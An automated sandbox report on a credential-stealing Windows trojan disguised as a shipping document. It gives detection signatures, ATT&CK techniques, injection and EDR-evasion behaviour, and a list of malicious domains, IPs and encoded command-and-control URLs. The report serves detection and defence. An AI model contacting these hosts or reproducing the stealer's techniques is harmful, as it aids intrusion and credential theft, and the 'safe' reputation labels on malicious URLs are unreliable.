              Source: Yara matchFile source: 00000007.00000002.4109844667.0000000002790000.00000040.80000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2034898129.0000000002530000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4110925188.0000000004700000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000002.00000002.2034731642.0000000001A80000.00000040.10000000.00040000.00000000.sdmp, type: MEMORY
              Yara detected PureLog Stealer
              Source: Yara matchFile source: 0.2.shipping document.exe.5ad0000.5.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipping document.exe.43a9970.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipping document.exe.5ad0000.5.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.shipping document.exe.43a9970.2.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 00000000.00000002.1680848791.0000000005AD0000.00000004.08000000.00040000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.1677691413.00000000043A9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY

              Mitre Att&ck Matrix

              ReconnaissanceResource DevelopmentInitial AccessExecutionPersistencePrivilege EscalationDefense EvasionCredential AccessDiscoveryLateral MovementCollectionCommand and ControlExfiltrationImpact
              Gather Victim Identity InformationAcquire InfrastructureValid AccountsWindows Management Instrumentation1
              DLL Side-Loading              		312
              Process Injection              		1
              Masquerading              		1
              OS Credential Dumping              		21
              Security Software Discovery              		Remote Services1
              Email Collection              		1
              Encrypted Channel              		Exfiltration Over Other Network MediumAbuse Accessibility Features
              CredentialsDomainsDefault AccountsScheduled Task/JobBoot or Logon Initialization Scripts1
              Abuse Elevation Control Mechanism              		1
              Disable or Modify Tools              		LSASS Memory2
              Process Discovery              		Remote Desktop Protocol11
              Archive Collected Data              		3
              Ingress Tool Transfer              		Exfiltration Over BluetoothNetwork Denial of Service
              Email AddressesDNS ServerDomain AccountsAtLogon Script (Windows)1
              DLL Side-Loading              		41
              Virtualization/Sandbox Evasion              		Security Account Manager41
              Virtualization/Sandbox Evasion              		SMB/Windows Admin Shares1
              Data from Local System              		4
              Non-Application Layer Protocol              		Automated ExfiltrationData Encrypted for Impact
              Employee NamesVirtual Private ServerLocal AccountsCronLogin HookLogin Hook312
              Process Injection              		NTDS1
              Application Window Discovery              		Distributed Component Object ModelInput Capture4
              Application Layer Protocol              		Traffic DuplicationData Destruction
              Gather Victim Network InformationServerCloud AccountsLaunchdNetwork Logon ScriptNetwork Logon Script11
              Deobfuscate/Decode Files or Information              		LSA Secrets2
              File and Directory Discovery              		SSHKeyloggingFallback ChannelsScheduled TransferData Encrypted for Impact
              Domain PropertiesBotnetReplication Through Removable MediaScheduled TaskRC ScriptsRC Scripts1
              Abuse Elevation Control Mechanism              		Cached Domain Credentials13
              System Information Discovery              		VNCGUI Input CaptureMultiband CommunicationData Transfer Size LimitsService Stop
              DNSWeb ServicesExternal Remote ServicesSystemd TimersStartup ItemsStartup Items4
              Obfuscated Files or Information              		DCSyncRemote System DiscoveryWindows Remote ManagementWeb Portal CaptureCommonly Used PortExfiltration Over C2 ChannelInhibit System Recovery
              Network Trust DependenciesServerlessDrive-by CompromiseContainer Orchestration JobScheduled Task/JobScheduled Task/Job22
              Software Packing              		Proc FilesystemSystem Owner/User DiscoveryCloud ServicesCredential API HookingApplication Layer ProtocolExfiltration Over Alternative ProtocolDefacement
              Network TopologyMalvertisingExploit Public-Facing ApplicationCommand and Scripting InterpreterAtAt1
              DLL Side-Loading              		/etc/passwd and /etc/shadowNetwork SniffingDirect Cloud VM ConnectionsData StagedWeb ProtocolsExfiltration Over Symmetric Encrypted Non-C2 ProtocolInternal Defacement

              Behavior Graph

              Hide Legend

              Legend:

              • Process
              • Signature
              • Created File
              • DNS/IP Info
              • Is Dropped
              • Is Windows Process
              • Number of created Registry Values
              • Number of created Files
              • Visual Basic
              • Delphi
              • Java
              • .Net C# or VB.NET
              • C, C++ or other language
              • Is malicious
              • Internet
              behaviorgraph top1 dnsIp2 2 Behavior Graph ID: 1430793 Sample: shipping document.exe Startdate: 24/04/2024 Architecture: WINDOWS Score: 100 27 www.tondex.finance 2->27 29 www.tavernadoheroi.store 2->29 31 19 other IPs or domains 2->31 47 Snort IDS alert for network traffic 2->47 49 Malicious sample detected (through community Yara rule) 2->49 51 Multi AV Scanner detection for submitted file 2->51 53 7 other signatures 2->53 10 shipping document.exe 3 2->10         started        signatures3 process4 process5 12 shipping document.exe 10->12         started        signatures6 57 Maps a DLL or memory area into another process 12->57 15 oWRaEnEJAq.exe 12->15 injected process7 signatures8 59 Found direct / indirect Syscall (likely to bypass EDR) 15->59 18 openfiles.exe 13 15->18         started        process9 signatures10 39 Tries to steal Mail credentials (via file / registry access) 18->39 41 Tries to harvest and steal browser information (history, passwords, etc) 18->41 43 Modifies the context of a thread in another process (thread injection) 18->43 45 2 other signatures 18->45 21 oWRaEnEJAq.exe 18->21 injected 25 firefox.exe 18->25         started        process11 dnsIp12 33 www.heldhold.life 203.161.46.103, 49750, 49751, 49752 VNPT-AS-VNVNPTCorpVN Malaysia 21->33 35 tavernadoheroi.store 162.240.81.18, 49754, 49755, 49756 UNIFIEDLAYER-AS-1US United States 21->35 37 9 other IPs or domains 21->37 55 Found direct / indirect Syscall (likely to bypass EDR) 21->55 signatures13

              Screenshots

              Thumbnails

              This section contains all screenshots as thumbnails, including those not shown in the slideshow.


              windows-stand

              Antivirus, Machine Learning and Genetic Malware Detection

              Initial Sample

              SourceDetectionScannerLabelLink
              shipping document.exe24%ReversingLabsWin32.Trojan.Generic
              shipping document.exe35%VirustotalBrowse
              shipping document.exe100%Joe Sandbox ML

              Dropped Files

              No Antivirus matches

              Unpacked PE Files

              No Antivirus matches

              Domains

              SourceDetectionScannerLabelLink
              carliente.com1%VirustotalBrowse
              www.a-two-spa-salon.com0%VirustotalBrowse
              td-ccm-neg-87-45.wixdns.net0%VirustotalBrowse
              www.jthzbrdb.fun3%VirustotalBrowse
              www.tavernadoheroi.store0%VirustotalBrowse
              www.carliente.com1%VirustotalBrowse
              www.tondex.finance1%VirustotalBrowse

              URLs

              SourceDetectionScannerLabelLink
              http://www.tiro.com0%URL Reputationsafe
              http://www.goodfont.co.kr0%URL Reputationsafe
              http://www.sajatypeworks.com0%URL Reputationsafe
              http://www.typography.netD0%URL Reputationsafe
              http://www.galapagosdesign.com/staff/dennis.htm0%URL Reputationsafe
              http://www.galapagosdesign.com/DPlease0%URL Reputationsafe
              http://www.sandoll.co.kr0%URL Reputationsafe
              http://www.urwpp.deDPlease0%URL Reputationsafe
              http://www.sakkal.com0%URL Reputationsafe
              http://www.carterandcone.coml0%URL Reputationsafe
              http://www.jiyu-kobo.co.jp/0%URL Reputationsafe
              http://www.founder.com.cn/cn/bThe0%Avira URL Cloudsafe
              http://www.paydayloans3.shop/3g97/0%Avira URL Cloudsafe
              http://www.tondex.finance0%Avira URL Cloudsafe
              http://www.jthzbrdb.fun/3g97/?AlB=sdJPX&12l42=0byNfP8xYbFTvv3TFTBCb86kR2BGbvQk+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhMgT0gLImR5/DqviqEDtH5dgpFLFfPLyFVKE=0%Avira URL Cloudsafe
              http://a-two-spa-salon.com/3g97/?12l42=14Ldh71M1tAlq6140%Avira URL Cloudsafe
              http://www.founder.com.cn/cn/bThe0%VirustotalBrowse
              http://www.tondex.finance1%VirustotalBrowse
              http://www.brothedboil.com/3g97/0%Avira URL Cloudsafe
              http://www.tavernadoheroi.store/3g97/0%Avira URL Cloudsafe
              http://www.a-two-spa-salon.com/3g97/0%Avira URL Cloudsafe
              http://www.corvidemporium.com/3g97/?12l42=xT2trqCQSb0YGfwnfC7AAWCSgoebgz86z2nMETOowAc4zyKeScBuNk+zQrcmduROogVqNtfeQZVF2OAhYZAs5wKafa9/anE/xTNtRCFpw92mm1bEow/bC00=&AlB=sdJPX0%Avira URL Cloudsafe
              http://www.tavernadoheroi.store/3g97/0%VirustotalBrowse
              http://www.founder.com.cn/cn/cThe0%Avira URL Cloudsafe
              http://nginx.net/0%Avira URL Cloudsafe
              http://www.a-two-spa-salon.com/3g97/0%VirustotalBrowse
              http://www.carliente.com/3g97/0%Avira URL Cloudsafe
              http://www.zhongyicts.com.cn0%Avira URL Cloudsafe
              http://www.mz3fk6g3.sbs/3g97/0%Avira URL Cloudsafe
              http://www.kansaiwoody.com/3g97/0%Avira URL Cloudsafe
              http://nginx.net/0%VirustotalBrowse
              http://www.a-two-spa-salon.com/3g97/?12l42=14Ldh71M1tAlq614+H+qL8FcHbYJSqGFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkSH7srevI7CXU30k1a21fOzbLf05e9HUvJZA=&AlB=sdJPX0%Avira URL Cloudsafe
              http://www.zhongyicts.com.cn1%VirustotalBrowse
              http://www.founder.com.cn/cn/cThe0%VirustotalBrowse
              http://www.levelstep.online/3g97/?AlB=sdJPX&12l42=chI4PXqGf2akS9KXcN1/fIedDZpx1haPemMkxCQLjjdC+0LHJVcL8RVSGr04qmANi3qgGmUbQWZg1h9oBh32jeRnCnRBYigKMCJed0uSuMGI415b3fHmBd4=0%Avira URL Cloudsafe
              http://www.tavernadoheroi.store/3g97/?12l42=i+yp5adQUIH0VEgvOjK1asLzAf4iESqSDXIw4u3g+VG2ev6y5D4E1hL0oESk2gA2rBhm9fxiezQ8IT1HT+LmxelGkpS4OcyZPgZgITeIYkhl82tlqROkzZ0=&AlB=sdJPX0%Avira URL Cloudsafe
              http://www.carliente.com/3g97/?AlB=sdJPX&12l42=pss1I4hPKcXAgTeMienjdKFyes9H9oPLrlXUMEqkxJwN3Lu9fPUDc8IPlpsJO9uNl7TAjBTqm2QSFPkGLslINQQyxLsDbCNKxleUNo2npjmmo3Auov63B2Q=0%Avira URL Cloudsafe
              http://www.sakkal.com80%Avira URL Cloudsafe
              http://www.mz3fk6g3.sbs/3g97/?12l42=ZDaHJbFbnHAFPJixhC0W5VJcO+3r+/EbU9/fBM2jNZ9+Ym38hIZ/X5pUYkV2fcPscAyJxVIUpy5G03sBlccn/BoOXNW31gfQYe8OGfTtnGJDjF2r8y9L4VM=&AlB=sdJPX0%Avira URL Cloudsafe
              http://hostname.domain.tld/0%Avira URL Cloudsafe
              http://www.heldhold.life/3g97/0%Avira URL Cloudsafe
              http://www.mz3fk6g3.sbs/3g97/4%VirustotalBrowse
              http://www.founder.com.cn/cn0%Avira URL Cloudsafe
              http://www.levelstep.online/3g97/0%Avira URL Cloudsafe
              http://www.tondex.finance/3g97/0%Avira URL Cloudsafe
              http://www.corvidemporium.com/3g97/0%Avira URL Cloudsafe
              http://www.brothedboil.com/3g97/?12l42=SimubthO8j6ps9851O6iFrPFbhU0j9rq0/tYQBfzEgGK5hVM85jEDi8N6ZmkhSeBx8n/pYDrpewbJx/zj6rVSge67MmYz8zyJ6w88vNyo3JtRae+fbqeQKU=&AlB=sdJPX0%Avira URL Cloudsafe
              http://www.paydayloans3.shop/3g97/?12l42=+UthD+705U1ao7DlNG8D0XAg53Vx3iw389CE+agLgXg1A2DbEeFYSszaWdWCIKr2NLn015a/QKEJl6wBw76YOQKFwTcvF/Pv+Bjw8BucK5rNlKIw4A0tIOg=&AlB=sdJPX0%Avira URL Cloudsafe
              http://www.heldhold.life/3g97/?AlB=sdJPX&12l42=meGryHO7z/6rT923FBL9q9LP9fsOajdjArpVhNvG0WuyKOeyc4yYaP5CwAgWJzIE3e4WxKJNZpro8/ttq32sXWhgj4qMLx7ltRSWVCmHVfZWVpKDtZXBa18=0%Avira URL Cloudsafe

              Domains and IPs

              Contacted Domains

              NameIPActiveMaliciousAntivirus DetectionReputation
              carliente.com
              		217.160.0.111
              		truetrueunknown
              www.heldhold.life
              		203.161.46.103
              		truetrue
                		unknown
                tavernadoheroi.store
                		162.240.81.18
                		truetrue
                  		unknown
                  www.a-two-spa-salon.com
                  		157.7.107.63
                  		truetrueunknown
                  www.paydayloans3.shop
                  		64.190.62.22
                  		truetrue
                    		unknown
                    parkingpage.namecheap.com
                    		91.195.240.19
                    		truefalse
                      		high
                      levelstep.online
                      		31.186.11.254
                      		truetrue
                        		unknown
                        www.mz3fk6g3.sbs
                        		172.217.16.36
                        		truefalse
                          		unknown
                          td-ccm-neg-87-45.wixdns.net
                          		34.149.87.45
                          		truetrueunknown
                          www.kansaiwoody.com
                          		118.27.122.214
                          		truetrue
                            		unknown
                            www.jthzbrdb.fun
                            		80.240.20.220
                            		truetrueunknown
                            www.tavernadoheroi.store
                            		unknown
                            		unknowntrueunknown
                            www.ordinarythoughts.org
                            		unknown
                            		unknowntrue
                              		unknown
                              www.brothedboil.com
                              		unknown
                              		unknowntrue
                                		unknown
                                www.mervadohome.com
                                		unknown
                                		unknowntrue
                                  		unknown
                                  www.tondex.finance
                                  		unknown
                                  		unknowntrueunknown
                                  www.levelstep.online
                                  		unknown
                                  		unknowntrue
                                    		unknown
                                    www.corvidemporium.com
                                    		unknown
                                    		unknowntrue
                                      		unknown
                                      www.alpine3dcreations.com
                                      		unknown
                                      		unknowntrue
                                        		unknown
                                        www.carliente.com
                                        		unknown
                                        		unknowntrueunknown

                                        Contacted URLs

                                        NameMaliciousAntivirus DetectionReputation
                                        http://www.paydayloans3.shop/3g97/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.jthzbrdb.fun/3g97/?AlB=sdJPX&12l42=0byNfP8xYbFTvv3TFTBCb86kR2BGbvQk+A1BHdxmY/MfvALInVuskjfkuf2FjiBL/p+WASS1FPmyok1wO3yhMgT0gLImR5/DqviqEDtH5dgpFLFfPLyFVKE=true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.brothedboil.com/3g97/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tavernadoheroi.store/3g97/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.a-two-spa-salon.com/3g97/true
                                        • 0%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.corvidemporium.com/3g97/?12l42=xT2trqCQSb0YGfwnfC7AAWCSgoebgz86z2nMETOowAc4zyKeScBuNk+zQrcmduROogVqNtfeQZVF2OAhYZAs5wKafa9/anE/xTNtRCFpw92mm1bEow/bC00=&AlB=sdJPXtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.carliente.com/3g97/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.mz3fk6g3.sbs/3g97/false
                                        • 4%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.kansaiwoody.com/3g97/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.a-two-spa-salon.com/3g97/?12l42=14Ldh71M1tAlq614+H+qL8FcHbYJSqGFN6RtTIloW1xTPtpRPWfTFb1ZY6KJ/sGolC/raog+W4a2BjveEWOkSH7srevI7CXU30k1a21fOzbLf05e9HUvJZA=&AlB=sdJPXtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.levelstep.online/3g97/?AlB=sdJPX&12l42=chI4PXqGf2akS9KXcN1/fIedDZpx1haPemMkxCQLjjdC+0LHJVcL8RVSGr04qmANi3qgGmUbQWZg1h9oBh32jeRnCnRBYigKMCJed0uSuMGI415b3fHmBd4=true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tavernadoheroi.store/3g97/?12l42=i+yp5adQUIH0VEgvOjK1asLzAf4iESqSDXIw4u3g+VG2ev6y5D4E1hL0oESk2gA2rBhm9fxiezQ8IT1HT+LmxelGkpS4OcyZPgZgITeIYkhl82tlqROkzZ0=&AlB=sdJPXtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.carliente.com/3g97/?AlB=sdJPX&12l42=pss1I4hPKcXAgTeMienjdKFyes9H9oPLrlXUMEqkxJwN3Lu9fPUDc8IPlpsJO9uNl7TAjBTqm2QSFPkGLslINQQyxLsDbCNKxleUNo2npjmmo3Auov63B2Q=true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.mz3fk6g3.sbs/3g97/?12l42=ZDaHJbFbnHAFPJixhC0W5VJcO+3r+/EbU9/fBM2jNZ9+Ym38hIZ/X5pUYkV2fcPscAyJxVIUpy5G03sBlccn/BoOXNW31gfQYe8OGfTtnGJDjF2r8y9L4VM=&AlB=sdJPXfalse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.heldhold.life/3g97/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.levelstep.online/3g97/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.tondex.finance/3g97/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.corvidemporium.com/3g97/true
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.brothedboil.com/3g97/?12l42=SimubthO8j6ps9851O6iFrPFbhU0j9rq0/tYQBfzEgGK5hVM85jEDi8N6ZmkhSeBx8n/pYDrpewbJx/zj6rVSge67MmYz8zyJ6w88vNyo3JtRae+fbqeQKU=&AlB=sdJPXtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.paydayloans3.shop/3g97/?12l42=+UthD+705U1ao7DlNG8D0XAg53Vx3iw389CE+agLgXg1A2DbEeFYSszaWdWCIKr2NLn015a/QKEJl6wBw76YOQKFwTcvF/Pv+Bjw8BucK5rNlKIw4A0tIOg=&AlB=sdJPXtrue
                                        • Avira URL Cloud: safe
                                        		unknown
                                        http://www.heldhold.life/3g97/?AlB=sdJPX&12l42=meGryHO7z/6rT923FBL9q9LP9fsOajdjArpVhNvG0WuyKOeyc4yYaP5CwAgWJzIE3e4WxKJNZpro8/ttq32sXWhgj4qMLx7ltRSWVCmHVfZWVpKDtZXBa18=true
                                        • Avira URL Cloud: safe
                                        		unknown

                                        URLs from Memory and Binaries

                                        NameSourceMaliciousAntivirus DetectionReputation
                                        http://www.tondex.financeoWRaEnEJAq.exe, 00000008.00000002.4113195669.00000000057BE000.00000040.80000000.00040000.00000000.sdmpfalse
                                        • 1%, Virustotal, Browse
                                        • Avira URL Cloud: safe
                                        		unknown
                                        https://duckduckgo.com/chrome_newtabopenfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                          		high
                                          http://www.fontbureau.com/designersGshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                            		high
                                            https://duckduckgo.com/ac/?q=openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                              		high
                                              http://www.fontbureau.com/designers/?shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                		high
                                                http://www.founder.com.cn/cn/bTheshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                • 0%, Virustotal, Browse
                                                • Avira URL Cloud: safe
                                                		unknown
                                                http://www.fontbureau.com/designers?shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  		high
                                                  http://www.tiro.comshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                  • URL Reputation: safe
                                                  		unknown
                                                  http://a-two-spa-salon.com/3g97/?12l42=14Ldh71M1tAlq614openfiles.exe, 00000007.00000002.4111642073.00000000054B6000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.00000000038B6000.00000004.00000001.00040000.00000000.sdmpfalse
                                                  • Avira URL Cloud: safe
                                                  		unknown
                                                  https://ch.search.yahoo.com/sugg/chrome?output=fxjson&appid=crmas&command=openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                    		high
                                                    http://www.fontbureau.com/designersshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      		high
                                                      http://www.goodfont.co.krshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.sajatypeworks.comshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.typography.netDshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://www.founder.com.cn/cn/cTheshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://nginx.net/openfiles.exe, 00000007.00000002.4111642073.0000000005AFE000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000003EFE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                      • 0%, Virustotal, Browse
                                                      • Avira URL Cloud: safe
                                                      		unknown
                                                      http://www.galapagosdesign.com/staff/dennis.htmshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                      • URL Reputation: safe
                                                      		unknown
                                                      http://fedoraproject.org/openfiles.exe, 00000007.00000002.4111642073.0000000005AFE000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000003EFE000.00000004.00000001.00040000.00000000.sdmpfalse
                                                        		high
                                                        https://ch.search.yahoo.com/favicon.icohttps://ch.search.yahoo.com/searchopenfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                          		high
                                                          http://www.galapagosdesign.com/DPleaseshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                          • URL Reputation: safe
                                                          		unknown
                                                          http://www.fonts.comshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            		high
                                                            http://www.sandoll.co.krshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.urwpp.deDPleaseshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            http://www.zhongyicts.com.cnshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • 1%, Virustotal, Browse
                                                            • Avira URL Cloud: safe
                                                            		unknown
                                                            http://www.sakkal.comshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                            • URL Reputation: safe
                                                            		unknown
                                                            https://www.strato.deoWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000004090000.00000004.00000001.00040000.00000000.sdmpfalse
                                                              		high
                                                              http://www.apache.org/licenses/LICENSE-2.0shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                		high
                                                                http://www.fontbureau.comshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                  		high
                                                                  https://github.com/Deathmax/Chest-Control/raw/master/version.txtshipping document.exefalse
                                                                    		high
                                                                    https://duckduckgo.com/favicon.icohttps://duckduckgo.com/?q=openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                      		high
                                                                      https://www.ecosia.org/newtab/openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        		high
                                                                        http://www.sakkal.com8shipping document.exe, 00000000.00000002.1681640369.0000000006410000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        http://www.carterandcone.comlshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                        • URL Reputation: safe
                                                                        		unknown
                                                                        http://hostname.domain.tld/firefox.exe, 00000009.00000002.2317219344.0000000019494000.00000004.80000000.00040000.00000000.sdmpfalse
                                                                        • Avira URL Cloud: safe
                                                                        		unknown
                                                                        https://www.sedo.com/services/parking.php3oWRaEnEJAq.exe, 00000008.00000002.4111122090.000000000486A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                          		high
                                                                          https://ac.ecosia.org/autocomplete?q=openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                            		high
                                                                            http://www.fontbureau.com/designers/cabarga.htmlNshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              		high
                                                                              http://www.founder.com.cn/cnshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                              • Avira URL Cloud: safe
                                                                              		unknown
                                                                              http://www.fontbureau.com/designers/frere-user.htmlshipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                		high
                                                                                https://www.namecheap.com/domains/registration/results/?domain=brothedboil.comopenfiles.exe, 00000007.00000002.4111642073.000000000646A000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4113701461.00000000078B0000.00000004.00000800.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.000000000486A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                  		high
                                                                                  http://www.jiyu-kobo.co.jp/shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                  • URL Reputation: safe
                                                                                  		unknown
                                                                                  https://img.sedoparking.com/templates/images/hero_nc.svgopenfiles.exe, 00000007.00000002.4111642073.000000000646A000.00000004.10000000.00040000.00000000.sdmp, openfiles.exe, 00000007.00000002.4113701461.00000000078B0000.00000004.00000800.00020000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.000000000486A000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                    		high
                                                                                    http://www.fontbureau.com/designers8shipping document.exe, 00000000.00000002.1681674456.00000000074E2000.00000004.00000800.00020000.00000000.sdmpfalse
                                                                                      		high
                                                                                      https://cdn.ecosia.org/assets/images/ico/favicon.icohttps://www.ecosia.org/search?q=openfiles.exe, 00000007.00000002.4113864801.0000000007BC8000.00000004.00000020.00020000.00000000.sdmpfalse
                                                                                        		high
                                                                                        http://browsehappy.com/openfiles.exe, 00000007.00000002.4111642073.0000000006146000.00000004.10000000.00040000.00000000.sdmp, oWRaEnEJAq.exe, 00000008.00000002.4111122090.0000000004546000.00000004.00000001.00040000.00000000.sdmpfalse
                                                                                          		high

                                                                                          World Map of Contacted IPs

                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs

                                                                                          Public IPs

                                                                                          IPDomainCountryFlagASNASN NameMalicious
                                                                                          172.217.16.36
                                                                                          		www.mz3fk6g3.sbsUnited States
                                                                                          		15169GOOGLEUSfalse
                                                                                          162.240.81.18
                                                                                          		tavernadoheroi.storeUnited States
                                                                                          		46606UNIFIEDLAYER-AS-1UStrue
                                                                                          157.7.107.63
                                                                                          		www.a-two-spa-salon.comJapan7506INTERQGMOInternetIncJPtrue
                                                                                          217.160.0.111
                                                                                          		carliente.comGermany
                                                                                          		8560ONEANDONE-ASBrauerstrasse48DEtrue
                                                                                          80.240.20.220
                                                                                          		www.jthzbrdb.funGermany
                                                                                          		20473AS-CHOOPAUStrue
                                                                                          64.190.62.22
                                                                                          		www.paydayloans3.shopUnited States
                                                                                          		11696NBS11696UStrue
                                                                                          34.149.87.45
                                                                                          		td-ccm-neg-87-45.wixdns.netUnited States
                                                                                          		2686ATGS-MMD-ASUStrue
                                                                                          203.161.46.103
                                                                                          		www.heldhold.lifeMalaysia
                                                                                          		45899VNPT-AS-VNVNPTCorpVNtrue
                                                                                          91.195.240.19
                                                                                          		parkingpage.namecheap.comGermany
                                                                                          		47846SEDO-ASDEfalse
                                                                                          118.27.122.214
                                                                                          		www.kansaiwoody.comJapan7506INTERQGMOInternetIncJPtrue
                                                                                          31.186.11.254
                                                                                          		levelstep.onlineTurkey
                                                                                          		199484BETAINTERNATIONALTRtrue

                                                                                          General Information

                                                                                          Joe Sandbox version:40.0.0 Tourmaline
                                                                                          Analysis ID:1430793
                                                                                          Start date and time:2024-04-24 07:24:26 +02:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 11m 7s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:9
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:2
                                                                                          Technologies:
                                                                                          • HCA enabled
